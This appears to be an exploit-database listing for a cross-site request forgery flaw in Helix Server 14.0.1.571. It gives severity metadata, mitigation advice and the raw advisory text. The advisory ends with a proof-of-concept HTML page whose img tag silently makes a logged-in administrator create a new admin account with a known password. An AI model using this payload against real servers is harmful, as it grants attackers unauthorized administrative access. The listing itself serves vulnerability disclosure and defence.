header-logo
Suggest Exploit
vendor:
Helix Server
by:
Unknown
5.5
CVSS
MEDIUM
Cross-site Request Forgery
352
CWE
Product Name: Helix Server
Affected Version From: Helix Server 14.0.1.571
Affected Version To: Unknown (other versions may also be affected)
Patch Exists: NO
Related CWE: Not mentioned
CPE: a:helixserver:helix_server:14.0.1.571
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Cross-site Request Forgery in Helix Server

An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site. They can trick the user into performing unintended actions on their behalf.

Mitigation:

Implementing anti-CSRF tokens, validating requests, and implementing strict referer checks can help mitigate this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45340/info

Helix Server is prone to a cross-site request-forgery vulnerability.

An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.

Helix Server 14.0.1.571 is vulnerable; other versions may also be affected. 

<html>
    <body>
        <img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
    </body>
</html>